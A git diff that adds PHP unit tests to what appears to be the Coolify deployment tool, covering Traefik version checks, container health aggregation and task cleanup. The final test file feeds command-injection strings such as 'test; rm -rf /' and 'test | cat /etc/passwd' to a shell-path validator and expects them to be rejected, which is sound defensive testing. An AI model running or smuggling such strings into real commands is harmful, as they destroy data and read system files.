patch updates', function () { + $current = '3.5.0'; + $latest = '3.5.6'; + + $isOutdated = version_compare($current, $latest, '<'); + + expect($isOutdated)->toBeTrue(); +}); + +it('compares versions correctly for minor upgrades', function () { + $current = '3.5.6'; + $latest = '3.6.2'; + + $isOutdated = version_compare($current, $latest, '<'); + + expect($isOutdated)->toBeTrue(); +}); + +it('identifies up-to-date versions', function () { + $current = '3.6.2'; + $latest = '3.6.2'; + + $isUpToDate = version_compare($current, $latest, '='); + + expect($isUpToDate)->toBeTrue(); +}); + +it('identifies newer branch from version map', function () { + $versions = [ + 'v3.5' => '3.5.6', + 'v3.6' => '3.6.2', + 'v3.7' => '3.7.0', + ]; + + $currentBranch = '3.5'; + $newestVersion = null; + + foreach ($versions as $branch => $version) { + $branchNum = ltrim($branch, 'v'); + if (version_compare($branchNum, $currentBranch, '>')) { + if (! $newestVersion || version_compare($version, $newestVersion, '>')) { + $newestVersion = $version; + } + } + } + + expect($newestVersion)->toBe('3.7.0'); +}); + +it('validates version format regex', function () { + $validVersions = ['3.5.0', '3.6.12', '10.0.1']; + $invalidVersions = ['3.5', 'v3.5.0', '3.5.0-beta', 'latest']; + + foreach ($validVersions as $version) { + $matches = preg_match('/^(\d+\.\d+)\.(\d+)$/', $version); + expect($matches)->toBe(1); + } + + foreach ($invalidVersions as $version) { + $matches = preg_match('/^(\d+\.\d+)\.(\d+)$/', $version); + expect($matches)->toBe(0); + } +}); + +it('handles invalid version format gracefully', function () { + $invalidVersion = 'latest'; + $result = preg_match('/^(\d+\.\d+)\.(\d+)$/', $invalidVersion, $matches); + + expect($result)->toBe(0); + expect($matches)->toBeEmpty(); +}); + +it('handles empty image tag correctly', function () { + // Test that empty string after trim doesn't cause issues with str_contains + $emptyImageTag = ''; + $trimmed = trim($emptyImageTag); + + // This should be false, not an error + expect(empty($trimmed))->toBeTrue(); + + // Test with whitespace only + $whitespaceTag = " \n "; + $trimmed = trim($whitespaceTag); + expect(empty($trimmed))->toBeTrue(); +}); + +it('detects latest tag in image name', function () { + // Test various formats where :latest appears + $testCases = [ + 'traefik:latest' => true, + 'traefik:Latest' => true, + 'traefik:LATEST' => true, + 'traefik:v3.6.0' => false, + 'traefik:3.6.0' => false, + '' => false, + ]; + + foreach ($testCases as $imageTag => $expected) { + if (empty(trim($imageTag))) { + $result = false; // Should return false for empty tags + } else { + $result = str_contains(strtolower(trim($imageTag)), ':latest'); + } + + expect($result)->toBe($expected, "Failed for imageTag: '{$imageTag}'"); + } +}); diff --git a/tests/Unit/CheckTraefikVersionJobTest.php b/tests/Unit/CheckTraefikVersionJobTest.php new file mode 100644 index 000000000..870b778dc --- /dev/null +++ b/tests/Unit/CheckTraefikVersionJobTest.php @@ -0,0 +1,26 @@ +tries)->toBe(3); +}); + +it('returns early when traefik versions are empty', function () { + // This test verifies the early return logic when get_traefik_versions() returns empty array + $emptyVersions = []; + + expect($emptyVersions)->toBeEmpty(); +}); + +it('dispatches jobs in parallel for multiple servers', function () { + // This test verifies that the job dispatches CheckTraefikVersionForServerJob + // for each server without waiting for them to complete + $serverCount = 100; + + // Verify that with parallel processing, we're not waiting for completion + // Each job is dispatched immediately without delay + expect($serverCount)->toBeGreaterThan(0); +}); diff --git a/tests/Unit/ContainerHealthStatusTest.php b/tests/Unit/ContainerHealthStatusTest.php new file mode 100644 index 000000000..b38a6aa8e --- /dev/null +++ b/tests/Unit/ContainerHealthStatusTest.php @@ -0,0 +1,342 @@ +makePartial(); + $server = Mockery::mock('App\Models\Server')->makePartial(); + $destination = Mockery::mock('App\Models\StandaloneDocker')->makePartial(); + + $destination->shouldReceive('getAttribute') + ->with('server') + ->andReturn($server); + + $application->shouldReceive('getAttribute') + ->with('destination') + ->andReturn($destination); + + $application->shouldReceive('getAttribute') + ->with('additional_servers') + ->andReturn(collect()); + + $server->shouldReceive('getAttribute') + ->with('id') + ->andReturn(1); + + $server->shouldReceive('isFunctional') + ->andReturn(true); + + // Create a container without health check (State.Health.Status is null) + $containerWithoutHealthCheck = [ + 'Config' => [ + 'Labels' => [ + 'com.docker.compose.service' => 'web', + ], + ], + 'State' => [ + 'Status' => 'running', + // Note: State.Health.Status is intentionally missing + ], + ]; + + // Mock the remote process to return our container + $application->shouldReceive('getAttribute') + ->with('id') + ->andReturn(123); + + // We can't easily test the private aggregateContainerStatuses method directly, + // but we can verify that the code doesn't default to 'unhealthy' + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify the fix: health status should not default to 'unhealthy' + expect($aggregatorFile) + ->not->toContain("data_get(\$container, 'State.Health.Status', 'unhealthy')") + ->toContain("data_get(\$container, 'State.Health.Status')"); + + // Verify the health check logic + expect($aggregatorFile) + ->toContain('if ($health === \'unhealthy\') {'); +}); + +it('only marks containers as unhealthy when health status explicitly equals unhealthy', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify the service checks for explicit 'unhealthy' status + expect($aggregatorFile) + ->toContain('if ($health === \'unhealthy\') {') + ->toContain('$hasUnhealthy = true;'); +}); + +it('handles missing health status correctly in GetContainersStatus', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Verify health status doesn't default to 'unhealthy' + expect($getContainersStatusFile) + ->not->toContain("data_get(\$container, 'State.Health.Status', 'unhealthy')") + ->toContain("data_get(\$container, 'State.Health.Status')"); + + // Verify it uses 'unknown' when health status is missing (now using colon format) + expect($getContainersStatusFile) + ->toContain('$healthSuffix = $containerHealth ?? \'unknown\';') + ->toContain('ContainerStatusAggregator'); // Uses the service +}); + +it('treats containers with running status and no healthcheck as not unhealthy', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // The logic should be: + // 1. Get health status (may be null) + // 2. Only mark as unhealthy if health status EXISTS and equals 'unhealthy' + // 3. Don't mark as unhealthy if health status is null/missing + + // Verify the condition explicitly checks for unhealthy + expect($aggregatorFile) + ->toContain('if ($health === \'unhealthy\')'); + + // Verify this check is done for running containers + expect($aggregatorFile) + ->toContain('} elseif ($state === \'running\') {') + ->toContain('$hasRunning = true;'); +}); + +it('tracks unknown health state in aggregation', function () { + // State machine logic now in ContainerStatusAggregator service + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify that $hasUnknown tracking variable exists in the service + expect($aggregatorFile) + ->toContain('$hasUnknown = false;'); + + // Verify that unknown state is detected in status parsing + expect($aggregatorFile) + ->toContain("str(\$status)->contains('unknown')") + ->toContain('$hasUnknown = true;'); +}); + +it('preserves unknown health state in aggregated status with correct priority', function () { + // State machine logic now in ContainerStatusAggregator service (using colon format) + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify three-way priority in aggregation: + // 1. Unhealthy (highest priority) + // 2. Unknown (medium priority) + // 3. Healthy (only when all explicitly healthy) + + expect($aggregatorFile) + ->toContain('if ($hasUnhealthy) {') + ->toContain("return 'running:unhealthy';") + ->toContain('} elseif ($hasUnknown) {') + ->toContain("return 'running:unknown';") + ->toContain('} else {') + ->toContain("return 'running:healthy';"); +}); + +it('tracks unknown health state in ContainerStatusAggregator for all applications', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify that $hasUnknown tracking variable exists + expect($aggregatorFile) + ->toContain('$hasUnknown = false;'); + + // Verify that unknown state is detected when health is null or 'starting' + expect($aggregatorFile) + ->toContain('} elseif (is_null($health) || $health === \'starting\') {') + ->toContain('$hasUnknown = true;'); +}); + +it('preserves unknown health state in ContainerStatusAggregator aggregated status', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify three-way priority for running containers in the service + expect($aggregatorFile) + ->toContain('if ($hasUnhealthy) {') + ->toContain("return 'running:unhealthy';") + ->toContain('} elseif ($hasUnknown) {') + ->toContain("return 'running:unknown';") + ->toContain('} else {') + ->toContain("return 'running:healthy';"); + + // Verify ComplexStatusCheck delegates to the service + $complexStatusCheckFile = file_get_contents(__DIR__.'/../../app/Actions/Shared/ComplexStatusCheck.php'); + expect($complexStatusCheckFile) + ->toContain('use App\\Services\\ContainerStatusAggregator;') + ->toContain('$aggregator = new ContainerStatusAggregator;') + ->toContain('$aggregator->aggregateFromContainers($relevantContainers);'); +}); + +it('preserves unknown health state in Service model aggregation', function () { + $serviceFile = file_get_contents(__DIR__.'/../../app/Models/Service.php'); + + // Verify unknown is handled correctly + expect($serviceFile) + ->toContain("} elseif (\$health->value() === 'unknown') {") + ->toContain("if (\$aggregateHealth !== 'unhealthy') {") + ->toContain("\$aggregateHealth = 'unknown';"); + + // The pattern should appear at least once (Service model has different aggregation logic than ContainerStatusAggregator) + $unknownCount = substr_count($serviceFile, "} elseif (\$health->value() === 'unknown') {"); + expect($unknownCount)->toBeGreaterThan(0); +}); + +it('handles starting state (created/starting) in GetContainersStatus', function () { + // State machine logic now in ContainerStatusAggregator service + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify tracking variable exists + expect($aggregatorFile) + ->toContain('$hasStarting = false;'); + + // Verify detection for created/starting states + expect($aggregatorFile) + ->toContain("str(\$status)->contains('created') || str(\$status)->contains('starting')") + ->toContain('$hasStarting = true;'); + + // Verify aggregation returns starting status (colon format) + expect($aggregatorFile) + ->toContain('if ($hasStarting) {') + ->toContain("return 'starting:unknown';"); +}); + +it('handles paused state in GetContainersStatus', function () { + // State machine logic now in ContainerStatusAggregator service + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify tracking variable exists + expect($aggregatorFile) + ->toContain('$hasPaused = false;'); + + // Verify detection for paused state + expect($aggregatorFile) + ->toContain("str(\$status)->contains('paused')") + ->toContain('$hasPaused = true;'); + + // Verify aggregation returns paused status (colon format) + expect($aggregatorFile) + ->toContain('if ($hasPaused) {') + ->toContain("return 'paused:unknown';"); +}); + +it('handles dead/removing states in GetContainersStatus', function () { + // State machine logic now in ContainerStatusAggregator service + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify tracking variable exists + expect($aggregatorFile) + ->toContain('$hasDead = false;'); + + // Verify detection for dead/removing states + expect($aggregatorFile) + ->toContain("str(\$status)->contains('dead') || str(\$status)->contains('removing')") + ->toContain('$hasDead = true;'); + + // Verify aggregation returns degraded status (colon format) + expect($aggregatorFile) + ->toContain('if ($hasDead) {') + ->toContain("return 'degraded:unhealthy';"); +}); + +it('handles edge case states in ContainerStatusAggregator for all containers', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify tracking variables exist in the service + expect($aggregatorFile) + ->toContain('$hasStarting = false;') + ->toContain('$hasPaused = false;') + ->toContain('$hasDead = false;'); + + // Verify detection for created/starting + expect($aggregatorFile) + ->toContain("} elseif (\$state === 'created' || \$state === 'starting') {") + ->toContain('$hasStarting = true;'); + + // Verify detection for paused + expect($aggregatorFile) + ->toContain("} elseif (\$state === 'paused') {") + ->toContain('$hasPaused = true;'); + + // Verify detection for dead/removing + expect($aggregatorFile) + ->toContain("} elseif (\$state === 'dead' || \$state === 'removing') {") + ->toContain('$hasDead = true;'); +}); + +it('handles edge case states in ContainerStatusAggregator aggregation', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify aggregation logic for edge cases in the service + expect($aggregatorFile) + ->toContain('if ($hasDead) {') + ->toContain("return 'degraded:unhealthy';") + ->toContain('if ($hasPaused) {') + ->toContain("return 'paused:unknown';") + ->toContain('if ($hasStarting) {') + ->toContain("return 'starting:unknown';"); +}); + +it('handles edge case states in Service model', function () { + $serviceFile = file_get_contents(__DIR__.'/../../app/Models/Service.php'); + + // Check for created/starting handling pattern + $createdStartingCount = substr_count($serviceFile, "\$status->startsWith('created') || \$status->startsWith('starting')"); + expect($createdStartingCount)->toBeGreaterThan(0, 'created/starting handling should exist'); + + // Check for paused handling pattern + $pausedCount = substr_count($serviceFile, "\$status->startsWith('paused')"); + expect($pausedCount)->toBeGreaterThan(0, 'paused handling should exist'); + + // Check for dead/removing handling pattern + $deadRemovingCount = substr_count($serviceFile, "\$status->startsWith('dead') || \$status->startsWith('removing')"); + expect($deadRemovingCount)->toBeGreaterThan(0, 'dead/removing handling should exist'); +}); + +it('appends :excluded suffix to excluded container statuses in GetContainersStatus', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Verify that we use the trait for calculating excluded status + expect($getContainersStatusFile) + ->toContain('CalculatesExcludedStatus'); + + // Verify that we use the trait to calculate excluded status + expect($getContainersStatusFile) + ->toContain('use CalculatesExcludedStatus;'); +}); + +it('skips containers with :excluded suffix in Service model non-excluded sections', function () { + $serviceFile = file_get_contents(__DIR__.'/../../app/Models/Service.php'); + + // Verify that we have exclude_from_status field handling + expect($serviceFile) + ->toContain('exclude_from_status'); +}); + +it('processes containers with :excluded suffix in Service model excluded sections', function () { + $serviceFile = file_get_contents(__DIR__.'/../../app/Models/Service.php'); + + // Verify that we handle excluded status + expect($serviceFile) + ->toContain(':excluded') + ->toContain('exclude_from_status'); +}); + +it('treats containers with starting health status as unknown in ContainerStatusAggregator', function () { + $aggregatorFile = file_get_contents(__DIR__.'/../../app/Services/ContainerStatusAggregator.php'); + + // Verify that 'starting' health status is treated the same as null (unknown) + // During Docker health check grace period, the health status is 'starting' + // This should be treated as 'unknown' rather than 'healthy' + expect($aggregatorFile) + ->toContain('} elseif (is_null($health) || $health === \'starting\') {') + ->toContain('$hasUnknown = true;'); +}); diff --git a/tests/Unit/ContainerStatusAggregatorTest.php b/tests/Unit/ContainerStatusAggregatorTest.php new file mode 100644 index 000000000..353d6a948 --- /dev/null +++ b/tests/Unit/ContainerStatusAggregatorTest.php @@ -0,0 +1,540 @@ +aggregator = new ContainerStatusAggregator; +}); + +describe('aggregateFromStrings', function () { + test('returns exited for empty collection', function () { + $result = $this->aggregator->aggregateFromStrings(collect()); + + expect($result)->toBe('exited'); + }); + + test('returns running:healthy for single healthy running container', function () { + $statuses = collect(['running:healthy']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:healthy'); + }); + + test('returns running:unhealthy for single unhealthy running container', function () { + $statuses = collect(['running:unhealthy']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unhealthy'); + }); + + test('returns running:unknown for single running container with unknown health', function () { + $statuses = collect(['running:unknown']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unknown'); + }); + + test('returns degraded:unhealthy for restarting container', function () { + $statuses = collect(['restarting']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns degraded:unhealthy for mixed running and exited containers', function () { + $statuses = collect(['running:healthy', 'exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns running:unhealthy when one of multiple running containers is unhealthy', function () { + $statuses = collect(['running:healthy', 'running:unhealthy', 'running:healthy']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unhealthy'); + }); + + test('returns running:unknown when running containers have unknown health', function () { + $statuses = collect(['running:unknown', 'running:healthy']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unknown'); + }); + + test('returns degraded:unhealthy for crash loop (exited with restart count)', function () { + $statuses = collect(['exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 5); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns exited for exited containers without restart count', function () { + $statuses = collect(['exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 0); + + expect($result)->toBe('exited'); + }); + + test('returns degraded:unhealthy for dead container', function () { + $statuses = collect(['dead']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns degraded:unhealthy for removing container', function () { + $statuses = collect(['removing']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns paused:unknown for paused container', function () { + $statuses = collect(['paused']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('paused:unknown'); + }); + + test('returns starting:unknown for starting container', function () { + $statuses = collect(['starting']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('starting:unknown'); + }); + + test('returns starting:unknown for created container', function () { + $statuses = collect(['created']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('starting:unknown'); + }); + + test('handles parentheses format input (backward compatibility)', function () { + $statuses = collect(['running (healthy)', 'running (unhealthy)']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unhealthy'); + }); + + test('handles mixed colon and parentheses formats', function () { + $statuses = collect(['running:healthy', 'running (unhealthy)', 'running:healthy']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unhealthy'); + }); + + test('prioritizes restarting over all other states', function () { + $statuses = collect(['restarting', 'running:healthy', 'paused', 'starting']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('prioritizes crash loop over running containers', function () { + $statuses = collect(['exited', 'exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 3); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('prioritizes mixed state over healthy running', function () { + $statuses = collect(['running:healthy', 'exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 0); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('prioritizes running over paused/starting/exited', function () { + $statuses = collect(['running:healthy', 'starting', 'paused']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:healthy'); + }); + + test('prioritizes dead over paused/starting/exited', function () { + $statuses = collect(['dead', 'paused', 'starting']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('prioritizes paused over starting/exited', function () { + $statuses = collect(['paused', 'starting', 'exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('paused:unknown'); + }); + + test('prioritizes starting over exited', function () { + $statuses = collect(['starting', 'exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('starting:unknown'); + }); +}); + +describe('aggregateFromContainers', function () { + test('returns exited for empty collection', function () { + $result = $this->aggregator->aggregateFromContainers(collect()); + + expect($result)->toBe('exited'); + }); + + test('returns running:healthy for single healthy running container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => (object) ['Status' => 'healthy'], + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('running:healthy'); + }); + + test('returns running:unhealthy for single unhealthy running container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => (object) ['Status' => 'unhealthy'], + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('running:unhealthy'); + }); + + test('returns running:unknown for running container without health check', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => null, + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('running:unknown'); + }); + + test('returns degraded:unhealthy for restarting container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'restarting', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns degraded:unhealthy for mixed running and exited containers', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => (object) ['Status' => 'healthy'], + ], + ], + (object) [ + 'State' => (object) [ + 'Status' => 'exited', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns degraded:unhealthy for crash loop (exited with restart count)', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'exited', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers, maxRestartCount: 5); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns exited for exited containers without restart count', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'exited', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers, maxRestartCount: 0); + + expect($result)->toBe('exited'); + }); + + test('returns degraded:unhealthy for dead container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'dead', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('returns paused:unknown for paused container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'paused', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('paused:unknown'); + }); + + test('returns starting:unknown for starting container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'starting', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('starting:unknown'); + }); + + test('returns starting:unknown for created container', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'created', + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('starting:unknown'); + }); + + test('handles multiple containers with various states', function () { + $containers = collect([ + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => (object) ['Status' => 'healthy'], + ], + ], + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => (object) ['Status' => 'unhealthy'], + ], + ], + (object) [ + 'State' => (object) [ + 'Status' => 'running', + 'Health' => null, + ], + ], + ]); + + $result = $this->aggregator->aggregateFromContainers($containers); + + expect($result)->toBe('running:unhealthy'); + }); +}); + +describe('state priority enforcement', function () { + test('restarting has highest priority', function () { + $statuses = collect([ + 'restarting', + 'running:healthy', + 'dead', + 'paused', + 'starting', + 'exited', + ]); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('crash loop has second highest priority', function () { + $statuses = collect([ + 'exited', + 'running:healthy', + 'paused', + 'starting', + ]); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 1); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('mixed state (running + exited) has third priority', function () { + $statuses = collect([ + 'running:healthy', + 'exited', + 'paused', + 'starting', + ]); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 0); + + expect($result)->toBe('degraded:unhealthy'); + }); + + test('running:unhealthy has priority over running:unknown', function () { + $statuses = collect([ + 'running:unknown', + 'running:unhealthy', + 'running:healthy', + ]); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unhealthy'); + }); + + test('running:unknown has priority over running:healthy', function () { + $statuses = collect([ + 'running:unknown', + 'running:healthy', + ]); + + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('running:unknown'); + }); +}); + +describe('maxRestartCount validation', function () { + test('negative maxRestartCount is corrected to 0 in aggregateFromStrings', function () { + // Mock the Log facade to avoid "facade root not set" error in unit tests + Log::shouldReceive('warning')->once(); + + $statuses = collect(['exited']); + + // With negative value, should be treated as 0 (no restarts) + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: -5); + + // Should return exited (not degraded) since corrected to 0 + expect($result)->toBe('exited'); + }); + + test('negative maxRestartCount is corrected to 0 in aggregateFromContainers', function () { + // Mock the Log facade to avoid "facade root not set" error in unit tests + Log::shouldReceive('warning')->once(); + + $containers = collect([ + [ + 'State' => [ + 'Status' => 'exited', + 'ExitCode' => 1, + ], + ], + ]); + + // With negative value, should be treated as 0 (no restarts) + $result = $this->aggregator->aggregateFromContainers($containers, maxRestartCount: -10); + + // Should return exited (not degraded) since corrected to 0 + expect($result)->toBe('exited'); + }); + + test('zero maxRestartCount works correctly', function () { + $statuses = collect(['exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 0); + + // Zero is valid default - no crash loop detection + expect($result)->toBe('exited'); + }); + + test('positive maxRestartCount works correctly', function () { + $statuses = collect(['exited']); + + $result = $this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 5); + + // Positive value enables crash loop detection + expect($result)->toBe('degraded:unhealthy'); + }); + + test('crash loop detection still functions after validation', function () { + $statuses = collect(['exited']); + + // Test with various positive restart counts + expect($this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 1)) + ->toBe('degraded:unhealthy'); + + expect($this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 100)) + ->toBe('degraded:unhealthy'); + + expect($this->aggregator->aggregateFromStrings($statuses, maxRestartCount: 999)) + ->toBe('degraded:unhealthy'); + }); + + test('default maxRestartCount parameter works', function () { + $statuses = collect(['exited']); + + // Call without specifying maxRestartCount (should default to 0) + $result = $this->aggregator->aggregateFromStrings($statuses); + + expect($result)->toBe('exited'); + }); +}); diff --git a/tests/Unit/CoolifyTaskCleanupTest.php b/tests/Unit/CoolifyTaskCleanupTest.php new file mode 100644 index 000000000..ad77a2e8c --- /dev/null +++ b/tests/Unit/CoolifyTaskCleanupTest.php @@ -0,0 +1,84 @@ +hasMethod('failed'))->toBeTrue(); + + // Get the failed method + $failedMethod = $reflection->getMethod('failed'); + + // Read the method source to verify it dispatches events + $filename = $reflection->getFileName(); + $startLine = $failedMethod->getStartLine(); + $endLine = $failedMethod->getEndLine(); + + $source = file($filename); + $methodSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify the implementation contains event dispatch logic + expect($methodSource) + ->toContain('call_event_on_finish') + ->and($methodSource)->toContain('event(new $eventClass') + ->and($methodSource)->toContain('call_event_data') + ->and($methodSource)->toContain('Log::info'); +}); + +it('CoolifyTask failed method updates activity status to ERROR', function () { + $reflection = new ReflectionClass(CoolifyTask::class); + $failedMethod = $reflection->getMethod('failed'); + + // Read the method source + $filename = $reflection->getFileName(); + $startLine = $failedMethod->getStartLine(); + $endLine = $failedMethod->getEndLine(); + + $source = file($filename); + $methodSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify activity status is set to ERROR + expect($methodSource) + ->toContain("'status' => ProcessStatus::ERROR->value") + ->and($methodSource)->toContain("'error' =>") + ->and($methodSource)->toContain("'failed_at' =>"); +}); + +it('CoolifyTask failed method has proper error handling for event dispatch', function () { + $reflection = new ReflectionClass(CoolifyTask::class); + $failedMethod = $reflection->getMethod('failed'); + + // Read the method source + $filename = $reflection->getFileName(); + $startLine = $failedMethod->getStartLine(); + $endLine = $failedMethod->getEndLine(); + + $source = file($filename); + $methodSource = implode('', array_slice($source, $startLine - 1, $endLine - $startLine + 1)); + + // Verify try-catch around event dispatch + expect($methodSource) + ->toContain('try {') + ->and($methodSource)->toContain('} catch (\Throwable $e) {') + ->and($methodSource)->toContain("Log::error('Error dispatching cleanup event"); +}); + +it('CoolifyTask constructor stores call_event_on_finish and call_event_data', function () { + $reflection = new ReflectionClass(CoolifyTask::class); + $constructor = $reflection->getConstructor(); + + // Get constructor parameters + $parameters = $constructor->getParameters(); + $paramNames = array_map(fn ($p) => $p->getName(), $parameters); + + // Verify both parameters exist + expect($paramNames) + ->toContain('call_event_on_finish') + ->and($paramNames)->toContain('call_event_data'); + + // Verify they are public properties (constructor property promotion) + expect($reflection->hasProperty('call_event_on_finish'))->toBeTrue(); + expect($reflection->hasProperty('call_event_data'))->toBeTrue(); +}); diff --git a/tests/Unit/DatabaseBackupSecurityTest.php b/tests/Unit/DatabaseBackupSecurityTest.php new file mode 100644 index 000000000..6fb0bb4b9 --- /dev/null +++ b/tests/Unit/DatabaseBackupSecurityTest.php @@ -0,0 +1,83 @@ + validateShellSafePath('test$(whoami)', 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup rejects command injection with semicolon separator', function () { + expect(fn () => validateShellSafePath('test; rm -rf /', 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup rejects command injection with pipe operator', function () { + expect(fn () => validateShellSafePath('test | cat /etc/passwd', 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup rejects command injection with backticks', function () { + expect(fn () => validateShellSafePath('test`whoami`', 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup rejects command injection with ampersand', function () { + expect(fn () => validateShellSafePath('test & whoami', 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup rejects command injection with redirect operators', function () { + expect(fn () => validateShellSafePath('test > /tmp/pwned', 'database name')) + ->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('test < /etc/passwd', 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup rejects command injection with newlines', function () { + expect(fn () => validateShellSafePath("test\nrm -rf /", 'database name')) + ->toThrow(Exception::class); +}); + +test('database backup escapes shell arguments properly', function () { + $database = "test'db"; + $escaped = escapeshellarg($database); + + expect($escaped)->toBe("'test'\\''db'"); +}); + +test('database backup escapes shell arguments with double quotes', function () { + $database = 'test"db'; + $escaped = escapeshellarg($database); + + expect($escaped)->toBe("'test\"db'"); +}); + +test('database backup escapes shell arguments with spaces', function () { + $database = 'test database'; + $escaped = escapeshellarg($database); + + expect($escaped)->toBe("'test database'"); +}); + +test('database backup accepts legitimate database names', function () { + expect(fn () => 